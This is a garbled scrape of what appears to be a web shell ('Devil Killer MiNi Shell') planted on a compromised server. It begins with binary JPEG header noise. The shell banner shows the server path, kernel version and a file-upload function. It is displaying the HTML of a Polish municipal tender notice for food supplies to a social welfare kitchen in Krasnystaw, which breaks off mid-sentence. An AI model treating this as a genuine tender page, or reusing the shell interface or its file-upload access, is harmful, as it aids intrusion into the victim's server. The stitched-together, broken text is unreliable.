JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231201/0052724001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Sukcesywna dostawa artykułów spożywczych dla kuchni<br/>Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI OŚRODEK POMOCY SPOŁECZNEJ W KRASNYMSTAWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002681398</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marszałka Piłsudskiego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krasnystaw</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">825762324</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mopskrasnystaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mopskrasnystaw.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Sukcesywna dostawa artykułów spożywczych dla kuchni<br/>Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7040b07e-8ac2-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00527240</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00020362/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa artykułów spożywczych dla kuchni Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://um-krasnystaw.zetopzp.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Na stronie https://um-krasnystaw.zetopzp.pl/ znajduje się Instrukcja dla Wykonawców. Dotyczy sposobu i formy złożenia oferty oraz możliwości komunikowania się Zamawiającego z Wykonawcami,<br/>Zamawiający informuje, że instrukcje korzystania z Platformy dotyczą w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy.<br/>Zakładka „Pomoc&#34; na stronie internetowej pod adresem: https://um-krasnystaw.zetopzp.pl/ .</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/><br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp., odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy dostępnej na stronie profilu nabywcy<br/>https://umkrasnystaw.zetopzp.pl/.<br/><br/>Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną.<br/>W zakresie pytań technicznych związanych z działaniem systemu prosi się o kontakt z Zakład Elektronicznej Techniki Obliczeniowej<br/>ZETO Sp. z o.o. pod nr tel.: Pomoc uzyskasz pod numerami telefonu: 81 718 42 27, 81 718 42 77, 691 958 325 oraz mailowo<br/>hd@zeto.lublin.pl i https://um-krasnystaw.zetopzp.pl/#/help.<br/><br/>Zgodnie z § 11 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz zgodnie z art. 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>a. Wymagania techniczne wymagane po stronie Zleceniodawcy:<br/>• Urządzenie posiadające przeglądarkę internetową w najnowszej dostępnej wersji:<br/>o Google Chrome<br/>o Mozilla Firefox<br/>o Microsoft Edge<br/>• Urządzenie posiadające co najmniej 2GB pamięci operacyjnej;<br/>• Urządzenie posiadające monitor o rozdzielczości minimalnej 1024x768px;<br/>• Konto poczty elektronicznej;<br/>• Dostęp do Internetu;<br/>b. Wymagania wymagane po stronie podmiotów biorących udział w postępowaniu na platformie:<br/>• Dowolne urządzenie posiadające przeglądarkę internetową w najnowszej dostępnej wersji:<br/>o Google Chrome<br/>o Mozilla Firefox<br/>o Microsoft Edge<br/>• Konto poczty elektronicznej<br/>• Dostęp do Internetu<br/>• Kwalifikowany podpis elektroniczny<br/><br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w ROZPORZĄDZENIU PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz ROZPORZĄDZENIE MINISTRA ROZWOJU, PRACY I TECHNOLOGII z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://um-krasnystaw.zetopzp.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>Administratorem Państwa danych osobowych jest Miejski Ośrodek Pomocy Społecznej w Krasnymstawie, który reprezentuje Dyrektor.<br/>Z administratorem danych osobowych można się kontaktować za pomocą poczty tradycyjnej pod adresem j/w, telefonicznie pod numerem 82 576 23 23 lub przy pomocy poczty e-mail: poczta@mopskrasnystaw.pl , adres: ul. Piłsudskiego 9 22-300 Krasnystaw.<br/>Administrator wyznaczył Inspektora Danych Osobowych tel.: 82 576 23 24 z którym można się kontaktować pod adresem e-mail: iodo@mopskrasnystaw.pl.<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1<br/>lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Sukcesywna dostawa artykułów spożywczych dla kuchni Miejskiego Ośrodka Pomocy Społecznej w Krasnymstawie – w trybie podstawowym.<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu ustawę Pzp,<br/>Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego,<br/>Niezależnie od postanowień powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego,<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.I.2201.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE I - Gotowe produkty garmażeryjne (mączne): pierogi ruskie świeże (nie mrożone)	kg	350<br/>pierogi z kaszą gryczaną świeże (nie mrożone)	kg	90<br/>pierogi z soczewicą świeże (nie mrożone)	kg	240<br/>pierogi z kapustą i grzybami świeże (nie mrożone)	kg	90<br/>kopytka świeże (nie mrożone)	kg	330<br/>kluski śląskie świeże (nie mrożone)	kg	220<br/>uszka z kapustą i grzybami (nie mrożone)	kg	6<br/>naleśniki z serem (nie mrożone)	kg	200 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15851220-6 - Ciasto makaronowe nadziewane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15851000-8 - Produkty mączne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością punktów.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych<br/>kryteriów oceny ofert, zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej<br/>wadze.<br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób określony powyżej, zamawiający wzywa wykonawców, którzy złożyli te oferty, do<br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty lub innych<br/>składanych dokumentów lub oświadczeń w tym zaoferowanej ceny.<br/>Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE II – Pieczywo – świeże wyroby piekarskie: chleb zwykły krojony – 900g	szt.	3200<br/>chleb razowy krojony – 600g	szt.	360<br/>paczek z dżemem w pudrze	szt.	250<br/>drożdżówka z serem – 100g	szt.	250<br/>bułka – 100g szt.	500 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami<br/>oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Opis kryterium oceny Znaczenie (%)<br/>1. Cena 60%<br/>2. Czas dostawy towaru 40%<br/>Razem 100%<br/>Kryterium CENA [C]<br/>CENA – 60%<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali punktowej.<br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny.<br/>Cena będzie oceniana metodą punktową wg wzoru:<br/>NAJNIŻSZA CENA ZE WSZYSTKICH<br/>C = ------------------------------------------------- x 60 = ILOŚĆ PUNKTÓW<br/>CENA OFERTY BADANEJ<br/>Kryterium CZAS dostawy TOWARU (T)<br/>Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium Czas dostawy towaru.<br/>W przypadku zaoferowania przez wykonawcę czasu dostawy towaru do zmawiającego może uzyskać od 5 do 40 pkt.<br/>Zamawiający uznaje za korzystny CZAS DOSTAWY TOWARU: godziny 7:00-09:00 w dniach pracy kuchni.<br/>Wskazane godziny dostawy w tym przedziale będzie skutkowało przyznaniem 40 pkt w ramach kryterium CZAS DOSTAWY<br/>TOWARU:<br/>a) Oferta, w której zadeklarowany zostanie czas do 1 godzin od wskazanego czasu – 30 pkt<br/>b) Oferta, w której zadeklarowany zostanie czas do 2 godzin od wskazanego czasu – 20 pkt<br/>c) Oferta, w której zadeklarowany zostanie czas do 3 godzin od wskazanego czasu – 10 pkt<br/>d) Oferta, w której zadeklarowany zostanie czas do 4 godzin od wskazanego czasu – 5 pkt<br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów czas dostawy towaru (maks.40)<br/>Opis sposobu obliczenia łącznej oceny ofert:<br/>Łączna ocena punktowa (Ł) oferty zostanie obliczona według formuły Ł = C + T<br/>Gdzie:<br/>C – ilość punktów przyznanych Wykonawcy w kryterium cena brutto zamówienia,<br/>T – ilość punktów przyznanych Wykonawcy w kryterium „Czas dostawy towaru”.<br/>Łączna ilość punktów oferty stanowi sumę ilości punktów przyznanych w kryterium „CENA” oraz ilości punktów przyznanych w<br/>kryterium „CZAS DOSTAWY TOWARU”.<br/>Oferta, która otrzyma największą łączną ilość punktów zostanie uznana za najkorzystniejszą. Pozostałe oferty zostaną<br/>sklasyfikowane zgodnie z uzyskaną łączną ilością 